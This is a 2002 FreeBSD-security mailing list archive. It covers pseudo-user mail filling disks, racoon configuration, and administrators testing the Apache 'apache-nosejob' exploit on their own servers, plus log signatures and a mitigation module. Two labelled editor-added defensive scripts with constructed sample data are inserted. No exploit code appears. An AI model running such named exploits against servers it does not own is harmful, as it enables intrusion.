> > So the short version is: where do I lower the timeout
> > of SSH?
>
> If you are using login with ssh, then you can modify login.conf:
>
> from man 5 login.conf
>
> idletime    time    Maximum idle time before logout.
>
> Read the manpage for more info and don't forget to run cap_mkdb if you
> change login.conf.

Does this actually work for you? There have been reports by different
people that this is a no-op. A very old PR (conf/9874) suggests it was
never implemented and should be removed from the manpage. There are at
least two ports (blimitd and idled) that claim to enforce this limit - I've
tried neither.
--
Dan Pelleg

From owner-freebsd-security Sat Jun 22 10:17:09 2002
Message-Id: <200206221716.g5MHGmJZ082170@orthanc.ab.ca>
From: Lyndon Nerenberg
Organization: The Frobozz Magic Homing Pigeon Company
To: Darren Pilgrim
Cc: "Kevin Kinsey, DaleCo, S.P.", Mark Hartley, twig les, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
In-reply-to: Your message of "Fri, 21 Jun 2002 21:40:19 PDT." <3D13FFB2.39A80570@pantherdragon.org>
Date: Sat, 22 Jun 2002 11:16:48 -0600

>>>>> "Darren" == Darren Pilgrim writes:

    Darren> IMO the proper way to handle this is to use an MTA that has
    Darren> some kind of access-control mechanism to restrict mail
    Darren> delivery to non-user accounts in addition to having a
    Darren> forwarding mechanism for them.

Such as a REJECT entry in /etc/mail/access?
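The audit script below is an added example by the editor of this archive page, not code from any message in the thread. It checks the condition the thread is about: for each pseudo-user in a passwd file it follows the aliases(5) entry and reports whether mail to that account would be written to a local mailbox (the disk-filling case Brett describes), dropped in /dev/null, or forwarded. It assumes sendmail's default behaviour of delivering unaliased local names to /var/mail/NAME, uses "uid below 1000 or a nologin shell" as its pseudo-user test, and the passwd and aliases files it reads are constructed samples.

```shell
#!/bin/sh
# Added audit script (editor's example, not from the thread).  For each
# pseudo-user in a passwd file it resolves the aliases(5) entry the way a
# default sendmail would: a bare local name is followed as a chain, /dev/null
# is the bitbucket, anything else (address, list, pipe, file, :include:) is a
# forward, and a name with no alias at all means local delivery to
# /var/mail/NAME, which is the disk-filling case described in the thread.
#
# Heuristic assumed here: a pseudo-user is any account other than root with
# uid < 1000 or a *nologin shell.  The passwd/aliases files below are
# constructed samples; on a host use /etc/passwd and /etc/mail/aliases.

# alias_target NAME ALIASES -> the alias target of NAME, or nothing if unaliased.
alias_target() {
    awk -F: -v u="$1" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }          # skip comments and blanks
        $1 == u {
            t = $2
            for (i = 3; i <= NF; i++) t = t ":" $i  # keep colons in :include:
            gsub(/^[ \t]+|[ \t]+$/, "", t)
            print t
            exit
        }' "$2"
}

# resolve NAME ALIASES -> "local MAILBOX" | "bitbucket" | "forward TARGET" | "loop NAME"
resolve() {
    name=$1
    hops=0
    while [ "$hops" -lt 16 ]; do
        t=$(alias_target "$name" "$2")
        case "$t" in
            "")                          echo "local $name"; return ;;
            /dev/null)                   echo bitbucket; return ;;
            *@*|*,*|\|*|/*|:include:*)   echo "forward $t"; return ;;
        esac
        name=$t                          # bare local name: follow the chain
        hops=$((hops + 1))
    done
    echo "loop $name"                    # alias cycle: flag for manual review
}

# pseudo_users PASSWD -> one account name per line
pseudo_users() {
    awk -F: '$1 != "root" && ($3 < 1000 || $7 ~ /nologin$/) { print $1 }' "$1"
}

# audit PASSWD ALIASES -> "NAME STATUS [TARGET]" per pseudo-user
audit() {
    pseudo_users "$1" | while read -r u; do
        printf '%-10s %s\n' "$u" "$(resolve "$u" "$2")"
    done
}

# count_unread PASSWD ALIASES -> number of pseudo-users whose mail lands in a
# local mailbox other than root's, i.e. one nobody is likely to read.
count_unread() {
    audit "$1" "$2" | awk '$2 == "local" && $3 != "root" { n++ } END { print n + 0 }'
}

SAMPLE_DIR=$(mktemp -d "${TMPDIR:-/tmp}/aliasaudit.XXXXXX")
trap 'rm -rf "$SAMPLE_DIR"' EXIT
SAMPLE_PASSWD=$SAMPLE_DIR/passwd
SAMPLE_ALIASES=$SAMPLE_DIR/aliases

# Constructed passwd excerpt in FreeBSD layout (not a real host's file).
cat > "$SAMPLE_PASSWD" <<'EOF'
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:14:5:Anonymous FTP Admin:/var/ftp:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
alice:*:1001:1001:Alice:/home/alice:/bin/sh
EOF

# Constructed aliases(5) excerpt showing all three outcomes plus a chain.
cat > "$SAMPLE_ALIASES" <<'EOF'
# root: me@my.domain      root itself is unaliased, so root's mail stays local
daemon: root
ftp:    root
news:   /dev/null
usenet: news
# man:  root              commented out: mail to man piles up in /var/mail/man
uucp:   uucp-admin@example.invalid
EOF

audit "$SAMPLE_PASSWD" "$SAMPLE_ALIASES"
echo "pseudo-users whose mail nobody reads: $(count_unread "$SAMPLE_PASSWD" "$SAMPLE_ALIASES")"
```

Accounts reported as "local" with a mailbox other than root (and "nobody", which no default aliases file covers) are the ones that need either an alias or an MTA-side reject before spam finds them.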
--lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 10:23:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [216.123.203.186]) by hub.freebsd.org (Postfix) with ESMTP id C435537B401 for ; Sat, 22 Jun 2002 10:23:14 -0700 (PDT) Received: from orthanc.ab.ca (localhost.orthanc.ab.ca [127.0.0.1]) by orthanc.ab.ca (8.12.3/8.12.3) with ESMTP id g5MHNEJZ082194; Sat, 22 Jun 2002 11:23:14 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200206221723.g5MHNEJZ082194@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: twig les Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-reply-to: Your message of "Fri, 21 Jun 2002 21:55:59 PDT." <20020622045559.41921.qmail@web10106.mail.yahoo.com> X-Mailer: mh-e 5.0.92; MH 6.8.4; Emacs 21.2 Date: Sat, 22 Jun 2002 11:23:14 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "twig" == twig les writes: twig> When I asked if it would break something to forward those twig> accounts' mail to /dev/null instead of root, I meant: do those twig> psuedo-users actually send anything via mail or everything via twig> syslog? In the case of UUCP and news, if you are running either of those subsystems the system will send legitimate mail to those logins, so you should be reading them. OTOH, if you don't run UUCP or news, you can reject mail to those accounts. Note that most Usenet software packages have a configurable target for emailed status reports, so you can have them mail directly to another address (say, root) if you like. Also, messages about the news subsystem are traditionally sent to usenet@, and not news@. 
On UNIX systems, the usenet address almost always exists only as an entry
in the mail alias file. If you run news, both usenet@ and news@ should be
redirected to a mailbox that is read regularly.

--lyndon

From owner-freebsd-security Sat Jun 22 12:05:53 2002
From: "Crist J. Clark"
Reply-To: cjclark@alum.mit.edu
Date: Sat, 22 Jun 2002 12:04:45 -0700
To: Nick Slager
Cc: security@freebsd.org
Subject: Re: Configuring sainfo in racoon(8)
Message-ID: <20020622120445.C33571@blossom.cjclark.org>
In-Reply-To: <20020622050353.A35129@zith.net>; from ns@zith.net on Sat, Jun 22, 2002 at 05:03:53AM -0500
X-URL: http://people.freebsd.org/~cjc/

On Sat, Jun 22, 2002 at 05:03:53AM -0500, Nick Slager wrote:
> Thus spake Crist J. Clark (crist.clark@attbi.com):
> >
> >         my_identifier user_fqdn "cjc@mydomain.org";
> >         peer_identifier user_fqdn "cjc@mydomain.org";
> >         ...
> > }
> >
> > sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" {
> >         ...
> > }
>
> Your specified sainfo stanza isn't matching (to state the bleedin'
> obvious, as John Cleese would say).

Yep. I realize that. racoon(8) reports it can't find the 'sainfo.'

> Perhaps this misses the point of what you're trying to do, but is there
> some reason you have to use user_fqdn identifiers?
>
> Try using:
>
>         my_identifier address;
>
> and change your sainfo stanza to reflect that address.

I want to use 'user_fqdn' because, 1) One end has a dynamic address so I
can't specify 'sainfo' with an address, and 2) I (will) have different
policies for different peers so I do not want to use an 'anonymous'
'sainfo.' I have no attachment to using 'user_fqdn,' it's just that I
don't want to try to use addresses since one end is dynamic, and
'user_fqdn' seemed the obvious choice from the racoon.conf(5) docs.

--
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From owner-freebsd-security Sat Jun 22 15:47:38 2002
From: jps@funeralexchange.com
Date: Sat, 22 Jun 2002 17:48:08 -0500 (CDT)
Subject: Re: Apache FreeBSD exploit released
Message-ID: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com>
In-Reply-To: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl>

I have been trying to crack two of my FreeBSD boxes for the past 12 hours
with no luck so far.

# 1 Server
apache+mod_ssl-1.3.23+2.8.7
4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002

# 2 Server
apache+mod_ssl-1.3.17+2.8.0
4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002

If you read through the source of the exploit you will see that it's
preconfigured to only attack certain versions at this time. I do however
believe with enough tweaking and time that you would crack a box. I have
tried it so far with no luck against the system posted above and an
older install with no luck either. The #1 server I am still trying to
crack and I will continue till it either fails or succeeds.

A couple of things to note on how to spot the attack in action. First is
that your messages logfile will be getting between 4-12 HTTPD SIG11
errors a second. Secondly your httpd-error.log will also have similar
information.

messages.log
Jun 22 17:00:01 cremator /kernel: pid 41578 (httpd), uid 80: exited on signal 11

httpd-error.log
[Sat Jun 22 17:43:52 2002] [notice] child pid 50043 exit signal Segmentation fault (11)

The only way to trace the attacker I have found so far is to do a netstat
during the attack and you will see the requests coming in on the requested
port (80 by default).

Anyone know of any ports or tools I could use on my servers to watch out
for something like this? I have already upgraded all my production
servers to the latest versions to protect them but I still would like to
have something like this in place just to be on the safe side.

Thanks

Jeremy Suo-Anttila
jps@funeralexchange.com
iUndertake Inc./ ALLNEO Network Operations.

> For those of you who do not read bugtraq, GOBBLES have posted a new
> version of their apache exploit which is said to support also Net and
> FreeBSD.
>
> --
> // Krzysztof Zaraska * kzaraska (at) student.uci.agh.edu.pl
> // Prelude IDS: http://www.prelude-ids.org/
> // A dream will always triumph over reality, once it is given the chance.
> //   -- Stanislaw Lem

From owner-freebsd-security Sat Jun 22 15:58:17 2002
From: Anders Nordby
Date: Sun, 23 Jun 2002 00:58:22 +0200
To: jps@funeralexchange.com
Cc: kzaraska@student.uci.agh.edu.pl, freebsd-security@freebsd.org
Subject: Re: Apache FreeBSD exploit released
Message-ID: <20020622225822.GA65796@totem.fix.no>
In-Reply-To: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com>
X-PGP-Key: http://anders.fix.no/pgp/

Hello,

On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote:
> I have been trying to crack two of my FreeBSD boxes for the past 12 hours
> with no luck so far.
>
> # 1 Server
> apache+mod_ssl-1.3.23+2.8.7
> 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002
>
> # 2 Server
> apache+mod_ssl-1.3.17+2.8.0
> 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002

I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache
1.3.23, which is not on its target list) for some hours, no success except
lots of httpds exiting on signal 11.

> Segmentation fault (11)
> The only way to trace the attacker I have found so far is to do a netstat
> during the attack and you will see the requests coming in on the requested
> port (80 by default).
> Anyone know of any ports or tools I could use on my servers to watch out
> for something like this? I have already upgraded all my production
> servers to the latest versions to protect them but I still would like to
> have something like this in place just to be on the safe side.

I just committed ports/www/mod_blowchunks, which you can use to reject
and log chunked requests.

Cheers,

--
Anders.

From owner-freebsd-security Sat Jun 22 15:59:26 2002
From: Brett Glass
Date: Sat, 22 Jun 2002 16:57:36 -0600
Subject: Re: Apache FreeBSD exploit released
Message-Id: <4.3.2.7.2.20020622165052.02209380@localhost>
In-Reply-To: <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com>

At 04:48 PM 6/22/2002, jps@funeralexchange.com wrote:

> Anyone know of any ports or tools I could use on my servers to watch out
> for something like this?

You can probably use some of the ideas I presented at the January BSDCon.
Either the Apache SetEnvIf regexes or the SNOBOL log monitor will work for
this one. See

http://www.brettglass.com/logmonitors/paper.html

for more.

--Brett

P.S. -- I'm still working on the replacement logging system mentioned in
that paper. It has an entirely new architecture; the hard part has been
backward compatibility with older Unices and with programs that expect to
communicate with syslogd.
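Jeremy's two log lines and Brett's pointer to log monitors are enough to build a small detector. The script below is an added example, not code from the thread and not from the SetEnvIf or SNOBOL tools Brett mentions: it counts httpd processes that exited on signal 11 per second, in both the /var/log/messages and Apache error-log formats quoted above, and reports the seconds that cross a threshold. The host name "cremator" and the 4-per-second default are taken from Jeremy's message; every other sample value is constructed.

```python
"""Flag bursts of httpd children dying on signal 11, in the two log
formats quoted in the thread (/var/log/messages and the Apache error log).

Sample lines are constructed: the host 'cremator' and the 4-per-second
threshold come from the thread, everything else is made up here."""
import re
import sys
from collections import Counter

# /var/log/messages, as quoted in the thread:
#   Jun 22 17:00:01 cremator /kernel: pid 41578 (httpd), uid 80: exited on signal 11
MESSAGES_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) \S+ /kernel: "
    r"pid (?P<pid>\d+) \((?P<proc>[^)]+)\), uid \d+: exited on signal (?P<sig>\d+)$"
)
# Apache error log, as quoted in the thread:
#   [Sat Jun 22 17:43:52 2002] [notice] child pid 50043 exit signal Segmentation fault (11)
ERRORLOG_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d \d{4})\] \[notice\] "
    r"child pid (?P<pid>\d+) exit signal .+? \((?P<sig>\d+)\)$"
)


def _second(mon, day, clock):
    # One key for both formats: syslog carries no year, Apache adds a weekday.
    return f"{mon} {int(day):2d} {clock}"


def parse_segv(line):
    """Return (second, pid) if LINE records an httpd dying on SIGSEGV, else None."""
    m = MESSAGES_RE.match(line)
    if m:
        if m.group("proc") != "httpd" or m.group("sig") != "11":
            return None
        mon, day, clock = m.group("ts").split()
        return _second(mon, day, clock), int(m.group("pid"))
    m = ERRORLOG_RE.match(line)
    if m:
        if m.group("sig") != "11":
            return None
        _wday, mon, day, clock, _year = m.group("ts").split()
        return _second(mon, day, clock), int(m.group("pid"))
    return None


def find_bursts(lines, threshold=4):
    """Seconds in which at least THRESHOLD httpd children segfaulted, in log order.

    One crash is ordinary; the thread reports 4-12 per second while the
    exploit is being run, so 4 is the default."""
    per_second = Counter()
    for line in lines:
        hit = parse_segv(line.rstrip("\n"))
        if hit:
            per_second[hit[0]] += 1
    return [(sec, n) for sec, n in per_second.items() if n >= threshold]


# Constructed samples: one isolated crash, a burst of five, a non-httpd
# segfault and an httpd killed by signal 9 (the last two must be ignored).
SAMPLE_MESSAGES = [
    "Jun 22 16:59:30 cremator /kernel: pid 41500 (cron), uid 0: exited on signal 15",
    "Jun 22 17:00:01 cremator /kernel: pid 41578 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41581 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41582 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41583 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41584 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41585 (httpd), uid 80: exited on signal 11",
    "Jun 22 17:00:05 cremator /kernel: pid 41590 (perl), uid 1001: exited on signal 11",
    "Jun 22 17:00:06 cremator /kernel: pid 41591 (httpd), uid 80: exited on signal 9",
]
SAMPLE_ERRORLOG = [
    "[Sat Jun 22 17:43:50 2002] [notice] Apache/1.3.23 (Unix) mod_ssl/2.8.7 configured -- resuming normal operations",
    "[Sat Jun 22 17:43:52 2002] [notice] child pid 50043 exit signal Segmentation fault (11)",
    "[Sat Jun 22 17:43:52 2002] [notice] child pid 50044 exit signal Segmentation fault (11)",
    "[Sat Jun 22 17:43:52 2002] [notice] child pid 50045 exit signal Segmentation fault (11)",
    "[Sat Jun 22 17:43:52 2002] [notice] child pid 50046 exit signal Segmentation fault (11)",
    "[Sat Jun 22 17:43:53 2002] [notice] child pid 50047 exit signal Segmentation fault (11)",
]

if __name__ == "__main__":
    # With file arguments, scan those logs; otherwise run over the samples.
    sources = [open(p) for p in sys.argv[1:]] or [SAMPLE_MESSAGES, SAMPLE_ERRORLOG]
    for src in sources:
        for sec, n in find_bursts(src):
            print(f"{sec}: {n} httpd segfaults in one second")
```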
From owner-freebsd-security Sat Jun 22 17:45:31 2002
From: Darren Pilgrim
Date: Sat, 22 Jun 2002 17:45:24 -0700
To: Lyndon Nerenberg
Cc: "Kevin Kinsey, DaleCo, S.P.", Mark Hartley, twig les, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-ID: <3D151A24.52D568F5@pantherdragon.org>
References: <200206221716.g5MHGmJZ082170@orthanc.ab.ca>

Lyndon Nerenberg wrote:
> >>>>> "Darren" == Darren Pilgrim writes:
>
>     Darren> IMO the proper way to handle this is to use an MTA that has
>     Darren> some kind of access-control mechanism to restrict mail
>     Darren> delivery to non-user accounts in addition to having a
>     Darren> forwarding mechanism for them.
>
> Such as a REJECT entry in /etc/mail/access?

I believe that is only matched against the inbound sender address. I
could be wrong, of course.
From owner-freebsd-security Sat Jun 22 18:33:05 2002
From: Marius Strom
Date: Sat, 22 Jun 2002 20:33:00 -0500
To: Anders Nordby
Cc: jps@funeralexchange.com, kzaraska@student.uci.agh.edu.pl, freebsd-security@FreeBSD.ORG
Subject: Re: Apache FreeBSD exploit released
Message-ID: <20020623013300.GB35692@marius.org>
In-Reply-To: <20020622225822.GA65796@totem.fix.no>

fwiw, i've tested mod_blowchunks and it seems to work pretty well. ymmv.
i wasn't able to exploit before installing it, so I have no guaranteed
proof that it works (however, it doesn't seem to break anything we've got
going either.)

On Sun, 23 Jun 2002, Anders Nordby wrote:
> Hello,
>
> On Sat, Jun 22, 2002 at 05:48:08PM -0500, jps@funeralexchange.com wrote:
> > I have been trying to crack two of my FreeBSD boxes for the past 12 hours
> > with no luck so far.
> > # 1 Server
> > apache+mod_ssl-1.3.23+2.8.7
> > 4.6-RC FreeBSD 4.6-RC #2: Tue Jun 4 23:33:52 CDT 2002
> >
> > # 2 Server
> > apache+mod_ssl-1.3.17+2.8.0
> > 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 21 05:43:49 GMT 2002
>
> I've been giving apache-nosejob.c a go too (on 4.5-RELEASE with Apache
> 1.3.23, which is not on its target list) for some hours, no success except
> lots of httpds exiting on signal 11.
>
> > Segmentation fault (11)
> > The only way to trace the attacker I have found so far is to do a netstat
> > during the attack and you will see the requests coming in on the requested
> > port (80 by default).
> > Anyone know of any ports or tools I could use on my servers to watch out
> > for something like this? I have already upgraded all my production
> > servers to the latest versions to protect them but I still would like to
> > have something like this in place just to be on the safe side.
>
> I just committed ports/www/mod_blowchunks, which you can use to reject
> and log chunked requests.
>
> Cheers,
>
> --
> Anders.

--
/------------------------------------------------->
Marius Strom           | Always carry a short length of fibre-optic cable.
Professional Geek      | If you get lost, then you can drop it on the
System/Network Admin   | ground, wait 10 minutes, and ask the backhoe
http://www.marius.org/ | operator how to get back to civilization.
\-------------| Alan Frame |---------------------->

From owner-freebsd-security Sat Jun 22 18:54:08 2002
From: Cyrille Lefevre
Organization: ACME
Date: Sun, 23 Jun 2002 03:53:54 +0200
To: Lyndon Nerenberg
Cc: Darren Pilgrim, "Kevin Kinsey, DaleCo, S.P.", Mark Hartley, twig les, security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-ID: <20020623015353.GB14530@gits.dyndns.org>
In-Reply-To: <200206221716.g5MHGmJZ082170@orthanc.ab.ca>

On Sat, Jun 22, 2002 at 11:16:48AM -0600, Lyndon Nerenberg wrote:
> >>>>> "Darren" == Darren Pilgrim writes:
>
>     Darren> IMO the proper way to handle this is to use an MTA that has
>     Darren> some kind of access-control mechanism to restrict mail
>     Darren> delivery to non-user accounts in addition to having a
>     Darren> forwarding mechanism for them.
>
> Such as a REJECT entry in /etc/mail/access?

The access seems to be only for domains, not users... The virtusertable
would be a good choice for that:

    bin@domain      error:5.1.1:550 User unknown

Too bad there is no xxxtable to handle such cases, like:

    bin             REJECT

Cyrille.

--
Cyrille Lefevre
mailto:cyrille.lefevre@laposte.net

From owner-freebsd-security Sat Jun 22 19:07:24 2002
From: Gregory Neil Shapiro
Date: Sat, 22 Jun 2002 19:07:19 -0700
To: Cyrille Lefevre
Cc: security@FreeBSD.ORG
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-ID: <15637.11607.813966.761277@horsey.gshapiro.net>
In-Reply-To: <20020623015353.GB14530@gits.dyndns.org>

cyrille.lefevre> the access seems to be only for domains, not users...

It can be used for usernames and complete addresses as well. However,
for blocking incoming addresses, you need:

    FEATURE(`blacklist_recipients')
        Turns on the ability to block incoming mail for certain
        recipient usernames, hostnames, or addresses. For example,
        you can block incoming mail to user nobody, host
        foo.mydomain.com, or guest@bar.mydomain.com. These
        specifications are put in the access db as described in the
        anti-spam configuration control section later in this
        document.

From owner-freebsd-security Sat Jun 22 22:08:41 2002
From: Lawrence Sica
Date: Sat, 22 Jun 2002 22:07:47 -0700
To: Trevor Johnson
Cc: security@freebsd.org
Subject: Re: Possible security liability: Filling disks with junk or spam
Message-ID: <3D1557A3.4030504@earthlink.net>
References: <20020621210455.F13586-100000@blues.jpj.net>

Trevor Johnson wrote:

> > A client recently called me in puzzlement, saying that his system was
> > misbehaving, and it turned out that this was what had happened. The
> > address "news@victim.com" had somehow wound up on quite a few spammers'
> > lists. He'd never used or hosted netnews, and so had no need for the
> > pseudo-user. But that pseudo-user was there by default, and the system
> > dutifully created a mailbox for him/her/it when the very first spam
> > arrived. It started growing by leaps and bounds until it was -- I kid
> > you not! -- several hundred megabytes in size. At which point the
> > partition ran out of room.
> >
> > It seems to me that pseudo-users should be non-mailable, just as a
> > basic security policy. Ideas for the best way to implement this in the
> > default install?
>
> My reading of the RFCs (excerpts follow) is that the "news" and "usenet"
> addresses should receive mail when NNTP is in use. It seems like a task
> for the sysadmin. How about comments in /etc/inetd.conf along the lines
> of:
>
> # Enable e-mail to the "ftp" address if you turn this on (RFC 2142).
> #ftp    stream  tcp6    nowait  root    /usr/libexec/ftpd       ftpd -l
> #
> # Enable e-mail to the "uucp" address if you turn this on (RFC 2142).
> #uucpd  stream  tcp     nowait  root    /usr/libexec/uucpd      uucpd
> #
> # Enable e-mail to "usenet" and "news" addresses if you turn this on (RFC 2142).
> #nntp   stream  tcp     nowait  usenet  /usr/libexec/nntpd      nntpd
>
> with the addresses commented out in /etc/aliases? Running "df" every few
> months wouldn't hurt, of course.

Consider that the daily output includes a df output so you just need to
read your root email ;)

They are commented in /etc/aliases. Actually you want to uncomment them.
If a news user exists, for example, and no alias is there, it delivers it
to the local spool for the news user. An alias would make it go elsewhere.

Imho nothing is broken, and this isn't a security issue so much as an
admin issue. This is where knowing your system and paying attention come
into play.

--Larry